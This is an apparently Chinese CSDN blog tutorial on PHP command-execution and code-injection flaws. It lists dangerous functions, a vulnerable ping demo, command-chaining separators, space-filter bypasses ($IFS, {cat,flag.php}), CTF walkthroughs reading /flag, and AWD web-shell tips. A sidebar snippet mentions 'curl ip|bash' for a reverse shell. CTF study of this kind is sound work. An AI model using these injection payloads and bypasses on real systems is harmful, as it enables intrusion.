命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass(空格,关键字过滤,变量绕过)-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping

最新推荐文章于 2024-06-01 16:25:22 发布
最新推荐文章于 2024-06-01 16:25:22 发布
阅读量903 收藏 3
点赞数
分类专栏: CTF刷题 网络安全 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51550750/article/details/122918611
版权

命令执行

命令执行是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。

比如PHP中的system,exec,shell_exec等,当用户可以控制命令执行中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。

简单举例来说就是,比如想要创建一个目录,可能不会用代码创建,但是知道系统命令是mkdir,借助系统命令mkdir来创建目录。
举例:cp /tmp/sourcefile /app/public/#{userinput}.jpg
cp是copy拷贝,将sourcefile拷贝到图片中去
如果用户的输入(userinput)是aaa;cat /flag,那么还会读取flag中的内容

命令注入是一种常见的 漏洞形态。一旦存在命令注入漏洞,攻击者就可以在目标系统执行任意命令。

命令注入攻击常用在向程序传入不安全参数(命令行参数、http头、cookie)。

注意:命令执行需要:
1.执行系统命令
2.执行的系统命令(参数)至少是可控的(或者部分可控),传参的地方就是用户可控的地方

命令执行继承Web Server用户的权限,一般都有权限写文件,写马、查看隐私信息、窃取源码,甚至可以反弹shell,危害十分大。
(用户通过服务器执行了php代码实现执行系统命令,所以说“命令执行继承Web Server用户的权限”)

一般Linux下最高权限是root,Web server下一般是www-data权限

漏洞位点

程序过滤不严谨,导致用户可以将代码注入并执行。

高危函数:
eval(),assert(),preg_replace(),call_user_func()等等

对于执行命令的函数,参数过滤不严谨,导致直接命令执行。

高危函数:
system(),exec(),shell_exec(),passthru(),pctnl_exec(),popen(),proc_open()
注:反引号是shell_exec()的别名

比如echo ls

代码注入

程序过滤不严谨,导致用户可以将代码注入并执行。

高危漏洞:
eval(),assert(),preg_replace(),call_user_func()等等

和命令执行的 区别是:
一个执行系统命令,一个执行PHP代码

漏洞利用

看一个Demo:

<?php
if (isset($_GET['ip'])){
 $ip = $_GET['ip'];
 echo shell_exec("ping -c 4 " . $ip);
}else{
 highlight_file(__file__);
}

正常情况下,输入主机地址,则正常返回命令执行结果
在这里插入图片描述
代码中的ip参数是直接通过GET方式传入并直接带入了命令中,这时尝试一下使用分隔符并添加一条命令

127.0.0.1;ls -l
在这里插入图片描述

联合执行

分号

cmd1;cmd2;cmd3

cmd1将首先运行,不管cmd1运行成功还是出现错误,cmd2都会在它之后运行,当cmd2命令完成时,cmd3将会运行

三个命令互不干扰

&&

有时候希望确保Linux命令中,只有在前一个命令成功结束时,下一个命令才会执行。这就是逻辑和运算符&&出现的地方

cmd1 && cmd2 && cmd3

当第一个命令出现错误时,&&分隔符的命令会停止执行后面的命令。

||

可以使用逻辑操作符(||)运行命令行,但是只有在前一个命令出现错误时才运行下一个命令:

cmd1 || cmd2 || cmd3

如果cmd1运行失败,则运行cmd2。如果cmd2运行成功,cmd3将不会运行。

前一个命令的结果作为后一个命令的参数

cmd1 | cmd2

例如:

echo xxx | base64

换行符
%0a
%0d

练习:actf2020exec 平台BUUCTF
在这里插入图片描述

在这里插入图片描述

首先尝试127.0.0.1
在这里插入图片描述

127.0.0.1;ls
在这里插入图片描述

;cat /flag
在这里插入图片描述
得到flag是flag{3e9af367-c215-4a33-9196-4b5314327d9f}

Bypass

过滤空格
$IFS
${IFS} //加{}是为了区分(间隔)
$IFS$9
< //在Linux中<表示导入
<>
{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来
%20
%09

过滤某关键字

在这里插入图片描述
练习题目:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
空格过滤

在这里插入图片描述
显然过滤了很多东西:
在这里插入图片描述
在这里插入图片描述
不报错了:(查看源代码得到flag)
在这里插入图片描述
flag{0af120ba-cd98-43e9-a099-3f9abac9de96}
在这里插入图片描述

变量
在这里插入图片描述

(上面那道GXYCTF就是一道用变量解决的例子)

PS补充

1.awd比赛中:无法删去别人的 马
在这里插入图片描述

www-data和ctf/test不属于一个用户组
解决办法:自己写一个马给自己,通过蚁剑连接Web Shell,通过这个Web shell去删除别人 的Web shell

2.如果别人中的马是每隔1秒写一个马,如何解决?

(如果别人的马是通过网页写的)
给自己写个马,连接Web shell (使自己变成www-data组的用户),再去执行kill -9 -1

若对方是(不是通过网页写的):
在这里插入图片描述

那么应该我应该执行:
在这里插入图片描述

3.反弹shell
如果已知IP和端口号:
在这里插入图片描述
在这里插入图片描述

qq_51550750
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF命令执行题目解题思路
悦分享
08-02 776
可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操作,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行命令,因此不会影响curl的执行。在自己服务器中放入bash一句话,利用curl ip|bash反弹shell。ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中。原理就是利用curl ip|bash等很多方式去反弹shell。利用linux下特有的命令来写入shell反弹。...
[ vulhub漏洞复现篇 ] Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906
qq_51577576的博客
09-07 1434
[ vulhub漏洞复现篇 ] Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906 Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。
BEES CMS 获取flag 命令执行漏洞
qfslyy的博客
01-07 1746
御剑扫出admin登录后台,出现一个flag 基本信息:有一个flag 上传一句话木马图片:抓包修改为php,蚁剑或菜刀连接 有个flag.php文件 信息泄露包括源码泄露,配置等 命令执行漏洞:(非代码执行) 应用程序源代码功能实现需要执行系统命令的函数,如果命令连接符控制此函数,就能执行系统命令,。 &,| || 都可以作为连接符使用,如果没有对函数过滤,导致在没有绝对路径的情况下被执行。 system (string KaTeX parse error: Expected 'EOF', got
CTF 命令执行绕过总结
最新发布
jnszstmei的博客
06-01 461
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示。或:rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或:rce-xor.php & rce-xor.py。%09(url传递)(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@,$x,${x}绕过。7、异或无符号(过滤0-9a-zA-Z)more:一页一页的显示档案内容。
25分钟了解命令执行漏洞例题+详细讲解】(一)
贤鱼的博客
09-11 2740
一文初入命令执行漏洞
【ctf】命令执行漏洞(二)
wlllllianqing的博客
10-15 338
命令执行漏洞(二) 命令执行无回显的判定方法 1.延时 2.http请求 3.dns请求 可使用ping请求,但是nc无法监听ping请求。 linux下的ping不会停止,windows下面的ping会停止 ping -c 3 xxx.xxx.xxx -c 3:ping3次 利用 1.写shell 2.http/dns等方式带出数据 '>'符号:将前面的命令生成的内容写到一个文件中 因为ping ip 是不能出现空格的,所以我们可以构造来消除空格 ...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
bypass-paywalls-chrome-clean-magnolia1234:绕过Paywalls Chrome Clean(GitLab代理)
03-31
绕过Paywalls Clean for Chrome 安装说明 根据,该扩展程序在Chrome网上应用店中不可用。 需要以下说明才能在基于的桌面浏览器中安装第三方扩展。 在扩展开发人员模式下,您始终可以通过Load unpacked (无自动更新...
sqli-bypass靶场
11-10
"sqli-bypass靶场"显然是一个专门用于测试和学习SQL注入漏洞绕过技术的平台。在这个靶场中,你可能会遇到各种防御机制,如输入过滤、参数化查询、存储过程等,而你需要学习如何在这些防御下找到漏洞并实施有效的SQL...
AsiaSecWest-2018-Chakra-vulnerability-and-exploit-bypass-all-system-mitigation:Chakra漏洞和利用漏洞绕过所有系统缓解措施
05-14
**Chakra漏洞与利用:绕过系统缓解措施详解** Chakra是Microsoft Edge浏览器中的JavaScript引擎,负责处理Web页面上的脚本执行。2018年,AsiaSecWest会议上的一场演讲详细介绍了Chakra中存在的一些漏洞以及如何巧妙...
命令执行漏洞
m0_71665129的博客
09-20 1412
Web安全攻防 命令执行漏洞
[PHP内核]PHP内核学习(四)------回答PHP的字符串解析特性Bypass([、空格被解析为_,[[只将第一个[解析为_)
Y4tacker的博客
09-27 1253
文章目录写在前面结果演示parse_str处理流程[、空格被解析为_[[只将第一个[解析为_ 写在前面 写这一篇是自己很早之前就很好奇为什么会这样处理,当时没什么能力,今天来尝试分析一下,php底层对其的处理,因为对web的调试比较麻烦,这里用parse_str分析代替,本文先跟踪parse_str流程再解释 结果演示 [被替换为_ test[a[bc被解析为test_a[bc 空格被替换为_ parse_str处理流程 parse_str实现在ext\standard\string.c 首先是初始化
CTF题目合集
cgygsw的博客
01-26 2719
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
[ACTF2020 新生赛]Exec命令执行漏洞
weixin_59233715的博客
12-12 522
OK了家人们看到 flag 了!
windows cat命令_黑客入门之命令执行漏洞详解
weixin_39675513的博客
11-24 817
1. 命令执行漏洞介绍当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。2. 命令执行漏洞:直接调用操作系统命令举个例子贴出代码这里发现con_fuction里面有exec,那么exec()这个函数是干嘛的呢?下面我给大家...
CISP-PTE XSS进阶实战+Bypass绕过技巧
beirry的博客
06-13 1306
通过上篇文章,我们对xss的三种类型以及利用方法有一个大概的了解了,那么接下来我们会讲讲该如何利用xss获取个人信息。还是以DVWA靶场,获取cookie为例子: 这里用了kali来做为我们接收cookie的服务器,需要先在kali上开启apache。 受害机能访问到kali即可。 跳转到/var/www/html/下,新建一个php文件,文件内容如下: 返回到html目录下,给html一个777权限,防止实验失败。 打开dvwa反射型页面,用low等级测试。 POC我们在上一章已经验证过了,就不再验
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
热门推荐
SoulCat
01-27 3万+
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日发布两个更新,这几次更新都修复了远程代码执行漏洞,对于5.0.x、5.1.x、5....
CTF Linux 命令执行常规bypass
weixin_30892889的博客
09-11 1585
截断符 常见的RCE的形式是给一个ping命令执行,只需要输入ip,然后返回ping ip的输出信息 常见的用来截断的符号 & && ; | || windows或linux下: command1 && command2 先执行command1后执行command2 command1 | command2 只执行c...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值